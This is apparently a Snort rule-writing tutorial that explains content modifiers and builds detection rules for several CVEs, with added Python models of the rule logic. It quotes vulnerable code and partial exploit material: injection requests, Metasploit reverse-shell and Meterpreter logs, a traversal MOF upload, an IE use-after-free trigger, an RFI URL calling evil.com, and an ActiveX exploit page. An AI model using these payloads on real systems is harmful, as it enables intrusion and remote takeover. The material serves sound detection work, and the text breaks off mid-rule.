Introduction to Snort
Rule Writing
Snort Rule Syntax
# rule header
alert tcp any any -> 192.168.1.0/24 111 (
# alert           rule action
# tcp             protocol
# any             src address
# any             src port
# 192.168.1.0/24  dst address
# 111             dst port
Snort Rule Syntax
# rule option format
alert tcp any any -> 192.168.1.0/24 111 (
msg:"Rule Message";
# msg             rule option
# "Rule Message"  rule option argument
rule option: content
# content match example
alert tcp any any -> 192.168.1.0/24 111 (
content:"ABCD"; 
# is equivalent to:
content:"|41 42 43 44|"; 
The content match finds a static pattern in
network data.
content modifiers: nocase
# content match modifiers: nocase
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABCD" or "abcd" etc.
content:"ABCD"; nocase;
nocase makes a content match case insensitive.
content matches are case sensitive by default.
content modifiers: offset
# content match modifiers: offset
alert tcp any any -> 192.168.1.0/24 111 (
# skip 2 bytes before searching for "ABCD"
content:"ABCD"; offset:2;
offset requires the match to occur after the
designated offset in network data.
content modifiers: depth
# content match modifiers: depth
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABCD" within the first 4 bytes of the payload
content:"ABCD"; depth:4;
depth restricts how far Snort should search for
the specified pattern.
content modifiers: distance
# content match modifiers: distance
alert tcp any any -> 192.168.1.0/24 111 (
# find "DEF" 1 byte after "ABC"
content:"ABC"; content:"DEF"; distance:1;
distance specifies how far into a payload Snort
should ignore before starting to search for the
specified pattern relative to the end of the
previous pattern match.
content modifiers: within
# content match modifiers: within
alert tcp any any -> 192.168.1.0/24 111 (
# find "EFG" within 10 bytes of "ABC"
content:"ABC"; content:"EFG"; within:10;
within makes sure that at most N bytes are
between pattern matches.
negated content match
# negated content match
alert tcp any any -> 192.168.1.0/24 111 (
# make sure "EFG" is NOT within 10 bytes of "ABC"
content:"ABC"; content:!"EFG"; within:10;
content matches can be negated.
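The offset, depth, distance, within and negation semantics described above can be tried out on a byte string. The following Python is an added teaching model written for this page, not Snort's own matcher: it keeps a cursor that each positive content match advances, uses offset/depth as absolute positions and distance/within as positions relative to that cursor, and treats a negated match as "absent from its window". The payload is constructed for the example.

```python
from typing import Optional

# Added example (not from the slides): a small Python model of how Snort's
# content modifiers move a cursor through a payload.  Semantics follow the
# descriptions above; Snort's own implementation is separate C code.

def find_content(payload: bytes, pattern: bytes, *, nocase: bool = False,
                 offset: int = 0, depth: Optional[int] = None,
                 distance: Optional[int] = None, within: Optional[int] = None,
                 start: int = 0) -> Optional[int]:
    """Search for one content match and return the cursor just past it.

    offset/depth are measured from the start of the payload; distance/within
    are measured from `start`, the end of the previous match.  `within` is the
    length of the search window, so the whole pattern must fit inside it.
    Returns None when the pattern is not found in the window.
    """
    if distance is not None or within is not None:
        lo = start + (distance or 0)
        hi = len(payload) if within is None else lo + within
    else:
        lo = offset
        hi = len(payload) if depth is None else offset + depth
    hay, needle = payload[lo:hi], pattern
    if nocase:
        hay, needle = hay.lower(), needle.lower()
    idx = hay.find(needle)
    return None if idx < 0 else lo + idx + len(pattern)


def evaluate(payload: bytes, matches: list) -> bool:
    """Evaluate an ordered list of (pattern, negated, modifiers) like a rule body.

    A negated match succeeds when the pattern is absent from its window and
    does not move the cursor; a positive match moves the cursor past itself.
    """
    cursor = 0
    for pattern, negated, modifiers in matches:
        end = find_content(payload, pattern, start=cursor, **modifiers)
        if negated:
            if end is not None:
                return False
        elif end is None:
            return False
        else:
            cursor = end
    return True


# Constructed sample payload (18 bytes): "ABCD" at 2..5, "DEF" at 7..9, "EFG" at 15..17.
PAYLOAD = b"xxABCD-DEF-----EFG"

if __name__ == "__main__":
    print(find_content(PAYLOAD, b"ABCD", offset=2))   # 6: found, cursor lands after "ABCD"
    print(find_content(PAYLOAD, b"ABCD", depth=4))    # None: only "xxAB" is searched
    print(evaluate(PAYLOAD, [(b"ABC", False, {}),
                             (b"EFG", False, {"within": 10})]))  # False: window is "D-DEF-----"
    print(evaluate(PAYLOAD, [(b"ABC", False, {}),
                             (b"EFG", True, {"within": 10})]))   # True: negated match succeeds
```

The within:10 case is the one worth staring at: the window starts at the end of "ABC" (byte 5) and is 10 bytes long, so "EFG", which ends at byte 18, needs within:13 before the match succeeds. That is why a rule author counts bytes from the end of the previous match, not from its start.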
content buffers
# content buffer example
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABC" within the HTTP URI
content:"ABC"; http_uri;
content matches can be restricted to a payload
location, such as the HTTP URI.
content buffers
POST /index.php HTTP/1.1
Host: example.com
Content-Length: 28
Content-Type: application/x-www-form-urlencoded
Cookie: this_is_a_cookie=this_is_its_value
firstparam=one&secondparam=two
Buffers: http_method http_uri http_header http_cookie
http_client_body
content modifiers: fast_pattern
# fast_pattern example
alert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_pattern
content:"ABC"; fast_pattern;
fast_pattern explicitly specifies the content
match within a rule to be used with the fast
pattern matcher. The fast_pattern serves as the
“entrance” condition for rule evaluation.
content modifiers: fast_pattern
# fast_pattern:only; example
alert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_pattern
content:"ABC"; fast_pattern:only;
fast_pattern:only; selects the content match to
be used in the fast pattern matcher for the
rule and also specifies that this match will
not be evaluated again when the rule “enters”.
rule option: pcre
# pcre rule option example
alert tcp any any -> 192.168.1.0/24 111 (
# match the following regex
pcre:"/A[BC]D/i"; 
pcre declares a Perl compatible regular
expression for matching on payload data.
Flags can be specified after the slash.
e.g. /i for case insensitivity.
Traffic Triage and Isolation
[Diagram: a triage funnel. fast_pattern and content matches (fast, high traffic volume) narrow Normal Traffic down to Vulnerable Application Traffic; further content matches narrow that to Vulnerable Parameter Traffic; pcre (slow, low traffic volume) confirms the Vulnerability Condition. Axes: Traffic Volume, Speed (fast to slow), Traffic Type.]
Detection Strategies
Detection Topics
Buffer Overflow
Command Injection
Directory Traversal
Use-After-Free
Remote File Include
Browser Plugins
Cross Site Scripting
Malware Command Traffic
Buffer Overflow Overview
Stack buffer overflow in AVM Fritz!Box daemon
dsl_control.
AVM Fritz!Box firmware fails to check the length of user
supplied data in a 'se' or ScriptExecute command sent in a
SOAP request to the dsl_control daemon.
dsl_cpi_cli_access.c registers the command 'se' to the
DSL_CPE_CLI_ScriptExecute handler function:
[...]
DSL_CPE_CLI_CMD_ADD_COMM (
"se",
"ScriptExecute",
DSL_CPE_CLI_ScriptExecute,
g_sSe);
[...]
DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...]) {
[...]
DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};
if(DSL_CPE_CLI_CheckParamNumber(pCommands,1,
DSL_CLI_EQUALS) == DSL_FALSE)
{
return -1;
}
DSL_CPE_sscanf(pCommands, "%s", sFileName);
[...]
The code calls the function DSL_CPE_sscanf in order to
copy the value of the parameter pCommands to the local
character array sFileName without restriction or bounds
checking. The size of the vulnerable stack buffer is 256
bytes as indicated in dsl_cpi_cli_console.h:
#define DSL_MAX_COMMAND_LINE_LENGTH 256
Triggering the vulnerability is then a simple matter of
sending >256 bytes in the first 'se' parameter.
Buffer Overflow Exploit
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
  xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:ifx="urn:dsl_api">
<SOAP-ENV:Body>
<ifx:DslCpeCliAccess>
<command>se "A"*300</command>
</ifx:DslCpeCliAccess>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Buffer Overflow Detection
# vulnerable SOAP request
# with at least 256 bytes
# within <command></command>
#
content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; 
content:"<command"; nocase; http_client_body; 
isdataat:256,relative; 
content:!"</command"; nocase; within:256; http_client_body; 
# stack buffer overflow (>256 bytes)
# within param0: <command> se param0 </command>
#
pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi";
Buffer Overflow Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 ( 
msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt"; 
flow:to_server,established; 
content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; 
content:"<command"; nocase; http_client_body; 
isdataat:256,relative; 
content:!"</command"; within:256; nocase; http_client_body; 
pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi"; 
metadata:policy security-ips drop, service http; 
classtype:attempted-admin; 
)
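To see how the rule body above narrows from the cheap fast_pattern to the expensive pcre, here is an added Python walk-through of the same steps (written for this page; it is not Snort and not Talos code). Each statement mirrors one rule option: the fast_pattern content, the "<command" content that sets the cursor, isdataat:256,relative, the negated "</command" within 256 bytes, and finally the regex. The three SOAP bodies are constructed in the shape of the exploit slide.

```python
import re

# Added example: Python model of the AVM Fritz!Box dsl_control rule body.
# Each step mirrors one rule option; it is a teaching re-implementation, not Snort.
CMD_RE = re.compile(rb"<command[^>]*?>\s*se\s[^<]{256}", re.I)


def detect_dsl_control_overflow(body: bytes) -> bool:
    # content:"DslCpeCliAccess"; fast_pattern:only; http_client_body;
    if b"DslCpeCliAccess" not in body:
        return False
    # content:"<command"; nocase; http_client_body;   (sets the cursor)
    idx = body.lower().find(b"<command")
    if idx < 0:
        return False
    cursor = idx + len(b"<command")
    # isdataat:256,relative;   -> at least 256 more bytes after the cursor
    if len(body) - cursor < 256:
        return False
    # content:!"</command"; nocase; within:256;   -> no closing tag in the next 256 bytes
    if b"</command" in body[cursor:cursor + 256].lower():
        return False
    # pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi";   -> 256 non-'<' bytes after "se "
    return CMD_RE.search(body) is not None


def soap_body(command: bytes) -> bytes:
    """Constructed SOAP envelope in the shape shown on the exploit slide."""
    return (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
            b' xmlns:ifx="urn:dsl_api"><SOAP-ENV:Body><ifx:DslCpeCliAccess><command>'
            + command +
            b'</command></ifx:DslCpeCliAccess></SOAP-ENV:Body></SOAP-ENV:Envelope>')


# Constructed test bodies.
OVERFLOW_BODY = soap_body(b'se "' + b"A" * 300 + b'"')    # > 256 bytes in the first 'se' parameter
BENIGN_BODY = soap_body(b"se /tmp/startup.scr")            # ordinary short script name
BORDERLINE_BODY = soap_body(b'se "' + b"A" * 200 + b'"')  # long, but "</command" arrives within 256 bytes

if __name__ == "__main__":
    for name, body in [("overflow", OVERFLOW_BODY), ("benign", BENIGN_BODY),
                       ("borderline", BORDERLINE_BODY)]:
        print(name, detect_dsl_control_overflow(body))
```

The borderline body is the useful negative: it passes isdataat because the rest of the envelope supplies the 256 bytes, and it is the negated "</command" within:256 check that rejects it, which is exactly why that check sits before the pcre.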
Command Injection Overview
CVE-2014-3805
Command injection vulnerabilities in AlienVault OSSIM av-centerd, which accepts SOAP commands on port 40007.
SOAP command 'get_log_line' parameter '$number_lines'
and 'get_license' parameter '$license_type' are used in OS
commands without sanitization.
Command Injection Overview
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_log_line() {
my ( $function_llamada, $name, $uuid, $admin_ip,
$hostname, $r_file, $number_lines ) = @_;
[...]
# $number_lines used in OS command without sanitization
my $command = "tail -$number_lines $r_file";
my @content = `$command`;
[...]
}
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_license() {
my ( $function_llamada, $name, $uuid, $admin_ip,
$hostname, $license, $license_type ) = @_;
[...]
# $license_type used in OS command without sanitization
my $package = system ("curl --proxy-anyauth -K /etc/curlrc http://[...]/avl/$license_type/[...]");
}
Command Injection Exploit
POST /av-centerd HTTP/1.1
Host: 172.16.8.223:40007
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 765
Content-Type: text/xml; charset=utf-8
SOAPAction: "AV/CC/Util#get_log_line"
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope soap:encodingStyle[...]>
<soap:Body><get_log_line xmlns="AV/CC/Util">
<c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3>
<c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c-gensym13>
</get_log_line></soap:Body></soap:Envelope>
Command Injection Exploit
msf exploit(alienvault_centerd_soap_exec) > exploit
[*] Started reverse handler on 172.16.158.1:4444
[*] Command shell session 1 opened (172.16.158.1:4444 ->
172.16.158.173:41320) at 2014-07-19 12:09:00 -0500
id
uid=0(root) gid=0(root) groups=0(root)
remember traffic isolation...
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt"; 
flow:to_server,established; 
content:"/av-centerd"; nocase; http_uri; 
content:"<get_log_line"; fast_pattern; nocase; http_client_body; 
content:"xsd:string"; distance:0; nocase; http_client_body; 
pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi"; 
metadata:service http; 
reference:cve,2014-3805; 
classtype:attempted-admin; 
)
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt"; 
flow:to_server,established; 
content:"/av-centerd"; nocase; http_uri; 
content:"<get_license"; fast_pattern; nocase; http_client_body; 
content:"xsd:string"; distance:0; nocase; http_client_body; 
pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi"; 
metadata:service http; 
reference:cve,2014-3805; 
classtype:attempted-admin; 
)
Command Injection Overview
CVE-2014-5073
OS command injection vulnerability in VMTurbo
Operations Manager vmtadmin.cgi parameter 'fileDate'.
If the 'callType' parameter is set to "DOWN" vmtadmin.cgi
will pass the value of 'fileDate' to system().
my $actiontype = $query->param("actionType");
my $calltype = $query->param("callType");
my $filedate = $query->param("fileDate");
my $statusfile = (defined $filedate) ? $filedate :
$mon.".".$mday." [...]
[...]
elsif ($calltype eq "DOWN") {
[...]
system("rm \"$upload_dir$statusfile\"");
[...]
Command Injection Exploit
GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP
&fileDate=%22%60printf%20%27177105114[...] HTTP/1.1
Host: 172.16.41.140
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Command Injection Exploit
msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit
[*] Started reverse handler on 172.16.158.1:4444
[*] Command shell session 1 opened (172.16.158.1:4444 ->
172.16.158.173:41320) at 2014-07-19 12:09:00 -0500
id
uid=0(root) gid=0(root) groups=0(root)
Command Injection Detection
Start by isolating traffic.
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; 
flow:to_server,established; 
content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; 
content:"callType=DOWN"; nocase; http_uri; 
content:"fileDate="; nocase; http_uri; 
pcre:"/[?&]fileDate=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)/Ui"; 
metadata:policy security-ips drop, service http; 
reference:cve,2014-5073; 
classtype:attempted-admin; 
)
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; 
flow:to_server,established; 
content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; 
content:"callType=DOWN"; nocase; http_uri; 
content:"fileDate="; nocase; http_raw_uri; 
content:"%26"; distance:0; http_raw_uri; 
pcre:"/[?&]fileDate=[^&]*?%26/Ii"; 
metadata:policy security-ips drop, service http; 
reference:cve,2014-5073; 
classtype:attempted-admin; 
)
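The two VMTurbo rules differ in which URI buffer they inspect, and the reason is easy to miss: in the normalized http_uri buffer an encoded %26 has already become a literal &, so a pcre that bounds the value with [^&]*? stops right there and the metacharacter class never sees it. The second rule therefore looks at http_raw_uri for the literal %26. The added Python below (written for this page, not Talos code) models both rules over three constructed request URIs; its "normalization" is only percent-decoding, a simplification of what Snort's HTTP inspector does.

```python
import re
from urllib.parse import unquote

# Added example: Python models of the two VMTurbo vmtadmin.cgi rule bodies.
# Regexes are the rules' pcre options; buffer handling is a simplified model.
META_RE = re.compile(r"[?&]fileDate=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)", re.I)  # /Ui
RAW_AMP_RE = re.compile(r"[?&]fileDate=[^&]*?%26", re.I)                              # /Ii


def normalized_uri(raw_uri: str) -> str:
    """Stand-in for the http_uri buffer: percent-decoding only (simplified)."""
    return unquote(raw_uri)


def common_prefilter(raw_uri: str) -> bool:
    """The content matches both rules share, evaluated on the normalized URI."""
    norm = normalized_uri(raw_uri)
    return ("/cgi-bin/vmtadmin.cgi" in norm            # fast_pattern:only; http_uri;
            and "calltype=down" in norm.lower())        # content:"callType=DOWN"; nocase; http_uri;


def rule_metachar(raw_uri: str) -> bool:
    """First rule: shell metacharacters in the decoded fileDate value."""
    norm = normalized_uri(raw_uri)
    return (common_prefilter(raw_uri)
            and "filedate=" in norm.lower()             # content:"fileDate="; nocase; http_uri;
            and META_RE.search(norm) is not None)


def rule_encoded_amp(raw_uri: str) -> bool:
    """Second rule: an encoded ampersand inside the raw fileDate value."""
    return (common_prefilter(raw_uri)
            and "filedate=" in raw_uri.lower()          # content:"fileDate="; nocase; http_raw_uri;
            and "%26" in raw_uri                        # content:"%26"; distance:0; http_raw_uri;
            and RAW_AMP_RE.search(raw_uri) is not None)


# Constructed sample URIs.
BASE = "/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate="
URI_BACKTICK = BASE + "%22%60id%60"      # decoded: fileDate="`id`   -> caught by the metachar rule
URI_ENCODED_AMP = BASE + "%22%26%26id"   # decoded: fileDate="&&id   -> only the raw-URI rule sees it
URI_BENIGN = BASE + "2014-07-19"         # an ordinary date value

if __name__ == "__main__":
    for uri in (URI_BACKTICK, URI_ENCODED_AMP, URI_BENIGN):
        print(uri.rsplit("=", 1)[1], rule_metachar(uri), rule_encoded_amp(uri))
```

Run it and the second URI is the one to note: after decoding it reads fileDate="&&id, the lazy [^&]*? in the first pcre halts at the ampersand, and only the raw-buffer rule fires. When a parameter delimiter doubles as an injection character, decide up front which buffer the regex must run against.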
Directory Traversal Overview
CVE-2014-2424
Directory traversal vulnerability in Oracle Event
Processing. The FileUploadServlet function
processUploadedFile() fails to properly sanitize the
filename parameter value.
The WMI service can be abused to convert the file upload
into remote code execution without user interaction.
private void processUploadedFile(FileItem paramFileItem)
{
try {
// paramFileItem.getName() used to
// create file without verification
paramFileItem.write(new File(this.uploadLocation,
paramFileItem.getName()));
} catch (Exception localException) { [...] }
}
Directory Traversal Exploit
POST /wlevs/visualizer/upload HTTP/1.1
Host: 172.16.8.29:9002
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828
Content-Length: 2658
--_Part_732_2993821416_1334322828
Content-Disposition: form-data; name="uploadfile";
filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
#pragma namespace("\\\\.\\root\\cimv2") [...]
Directory Traversal Exploit
msf exploit(oracle_event_processing_upload) > rexploit
[*] Reloading module...
[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.198:9002 - Generating payload and mof file...
[*] 172.16.158.198:9002 - Uploading the exe payload hENIwUPM.exe...
[*] 172.16.158.198:9002 - Uploading the MOF file klIvousnq.mof
[*] Sending stage (769536 bytes) to 172.16.158.198
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.198:1052) at
2014-06-29 15:42:37 -0500
[+] Deleted wbem/mof/klIvousnq.mof
[!] This exploit may require manual cleanup of 'hENIwUPM.exe' on the target
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Directory Traversal Detection
#
# Multipart POST
#
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; 
content:"filename"; nocase; http_client_body; 
content:"Content-Disposition"; nocase; http_client_body; 
pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi"; 
#
# Urlencoded POST
#
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; 
content:"filename="; nocase; http_client_body; 
pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim";
Directory Traversal Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; 
flow:to_server,established; 
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; 
content:"filename"; nocase; http_client_body; 
content:"Content-Disposition"; nocase; http_client_body; 
pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi"; 
metadata:policy balanced-ips drop, policy security-ips drop, service http; 
reference:cve,2014-2424; 
classtype:attempted-admin; 
)
Directory Traversal Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; 
flow:to_server,established; 
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; 
content:"filename="; nocase; http_client_body; 
pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim"; 
metadata:policy balanced-ips drop, policy security-ips drop, service http; 
reference:cve,2014-2424; 
classtype:attempted-admin; 
)
Use-After-Free Overview
CVE-2013-3893
This vulnerability is triggered by Javascript that sets an onlosecapture()
handler on the parent of two elements. This handler clears the DOM with
document.write() when it is called. The Javascript then calls setCapture() on
the parent and the child element. This triggers the onlosecapture() handler,
freeing a reference with document.write(). After the free, the invalid
reference will remain causing a crash (or code execution) in
MSHTML!CTreeNode::GetInterface.
Use-After-Free Trigger
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);
id_0.onlosecapture=function(e) {
document.write("");
}
id_0.setCapture();
id_1.setCapture();
}
Use-After-Free Trigger
0:005> r
eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34
eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
MSHTML!CTreeNode::GetInterface+0xd8:
679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????
Use-After-Free Detection
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any ( 
msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; 
flow:to_client,established; 
file_data; 
content:".applyElement"; nocase; 
content:".onlosecapture"; nocase; within:500; fast_pattern; 
content:".setCapture"; nocase; within:500; 
content:".setCapture"; nocase; within:500; 
pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si"; 
metadata:service ftp-data, service http, service imap, service pop3; 
reference:cve,2013-3893; 
)
Use-After-Free Detection
alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 ( 
msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; 
flow:to_server,established; 
file_data; 
content:".applyElement"; nocase; 
content:".onlosecapture"; nocase; within:500; fast_pattern; 
content:".setCapture"; nocase; within:500; 
content:".setCapture"; nocase; within:500; 
pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si"; 
metadata:service smtp; 
reference:cve,2013-3893; 
)
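The interesting part of the onlosecapture rules is the named backreference: the content matches only establish that .applyElement, .onlosecapture and two .setCapture calls occur close together, while the pcre captures the element passed to applyElement and requires that the same variable later receives the handler and the setCapture call. The added Python below (an illustration for this page, not Talos code) runs the same logic over two constructed scripts: one shaped like the trigger above, and one that uses all the same API calls on different elements.

```python
import re

# Added example: Python model of the onlosecapture rule body, run over
# constructed script text instead of Snort's file_data buffer.
UAF_RE = re.compile(
    rb"\.applyElement\s*\(\s*(?P<var>\w+)\s*\)"   # capture the element passed to applyElement
    rb".*?(?P=var)\.onlosecapture"                 # the same element gets an onlosecapture handler
    rb".*?(?P=var)\.setCapture",                   # and setCapture is later called on it
    re.S | re.I,
)


def matches_onlosecapture_rule(script: bytes) -> bool:
    low = script.lower()
    # content:".applyElement"; nocase;
    start = low.find(b".applyelement")
    if start < 0:
        return False
    # content:".onlosecapture"; nocase; within:500;  -> window relative to the previous match
    cursor = start + len(b".applyelement")
    idx = low.find(b".onlosecapture", cursor, cursor + 500)
    if idx < 0:
        return False
    # two content:".setCapture"; nocase; within:500; each relative to the previous match
    pos = idx + len(b".onlosecapture")
    for _ in range(2):
        idx = low.find(b".setcapture", pos, pos + 500)
        if idx < 0:
            return False
        pos = idx + len(b".setcapture")
    # pcre: the backreference ties all three uses to the same variable
    return UAF_RE.search(script) is not None


# Constructed sample in the shape of the trigger function above.
TRIGGER_SCRIPT = b"""
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);
id_0.onlosecapture = function(e) { document.write(""); };
id_0.setCapture();
id_1.setCapture();
"""

# Constructed benign sample: same API calls, but never the same element in all three places.
BENIGN_SCRIPT = b"""
var outer = document.createElement("div");
var inner = document.createElement("span");
outer.applyElement(inner);
outer.onlosecapture = function(e) { log("capture lost"); };
inner.setCapture();
inner.setCapture();
"""

if __name__ == "__main__":
    print(matches_onlosecapture_rule(TRIGGER_SCRIPT))  # True
    print(matches_onlosecapture_rule(BENIGN_SCRIPT))   # False: content checks pass, pcre does not
```

The benign script satisfies every content match, so without the pcre the rule would alert on any page that happens to use these three methods near each other; the backreference is what turns "these tokens appear" into "this sequence of operations on one element".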
Remote File Include Overview
CVE-2008-5053
Remote file include vulnerability in Joomla Simple RSS Reader allows execution of
arbitrary PHP code via the parameter mosConfig_live_site in
administrator/components/com_rssreader/admin.rssreader.php:
include("$mosConfig_live_site/components/com_rssreader/about.html");
$mosConfig_live_site is obtained from the GET parameter of the same name sent to
admin.rssreader.php.
Exploit:
http://site/joomlapath/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://evil.com/
Remote File Include Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP Joomla admin.rssreader.php remote file include attempt"; 
flow:to_server,established; 
content:"admin.rssreader.php"; fast_pattern:only; http_uri; 
content:"mosConfig_live_site="; nocase; http_uri; 
pcre:"/[?&]mosConfig_live_site=[^&]*?(http|ftp)/Ui"; 
metadata:service http; 
reference:cve,2008-5053; 
classtype:web-application-attack; 
)
Browser Plugin Overview
CVE-2012-2516
GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help
functionality for the Proficy enterprise data collection system. It can be
instantiated in a web page using the <object> tag, for example:
<object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681">
Or using Javascript:
obj = new ActiveXObject("KeyHelp.KeyScript")
The API of this ActiveX object exposes several methods including
LaunchTriPane(), which has the following prototype:
Void LaunchTriPane(System.string ChmFile)
The function LaunchTriPane will use ShellExecute to launch hh.exe, with user
controlled data as parameters:
> HH.EXE -decompile D:/destination-folder C:/test.chm
This can be abused to write arbitrary files. Code execution is possible by
uploading a WMI .mof file.
Browser Plugin Disassembly
KeyHelp.ocx:
5D335165 CALL KeyHelp.5D31797F
5D33516A JMP SHORT KeyHelp.5D33517D
5D33516C PUSH 5
5D33516E PUSH EDI
5D33516F PUSH ESI ; Malicious command line parameters - no validation
5D335170 PUSH KeyHelp.5D347950 ; ASCII "hh.exe"
5D335175 PUSH EDI
5D335176 PUSH EDI
5D335177 CALL SHELL32.ShellExecuteA ; run hh.exe with malicious params
5D33517D CMP ESI,EDI
5D33517F JE SHORT KeyHelp.5D335187
5D335181 PUSH ESI
Browser Plugin Exploit
<html>
<body><script>
KeyScript = new ActiveXObject("KeyHelp.KeyScript");
ChmPayloadFile = "-decompile C:\\WINDOWS\\system32 " +
"\\\\172.16.211.11\\A5vTb1QLAqfif\\DoixwWS.chm";
ChmMofFile = "-decompile c:\\WINDOWS\\system32\\wbem\\mof " +
"\\\\172.16.211.11\\A5vTb1QLAqfif\\QLQklKr.chm";
KeyScript.LaunchTriPane(ChmPayloadFile);
setTimeout('KeyScript.LaunchTriPane(ChmMofFile);',3000);
</script></body>
</html>
Browser Plugin Detection
#
# <OBJECT> Detection
#
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( 
msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; 
flow:to_client,established; 
file_data; 
content:"45E66957-2932-432A-A156-31503DF0A681"; fast_pattern:only; 
content:"LaunchTriPane"; nocase; 
metadata:policy security-ips drop, service http; 
reference:cve,2012-2516; 
classtype:attempted-user; 
)
Browser Plugin Detection
#
# Javascript Detection
#
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( 
msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; 
flow:to_client,established; 
file_data; 
content:"KeyHelp.KeyScript"; fast_pattern:only; 
content:"LaunchTriPane"; nocase; 
metadata:policy security-ips drop, service http; 
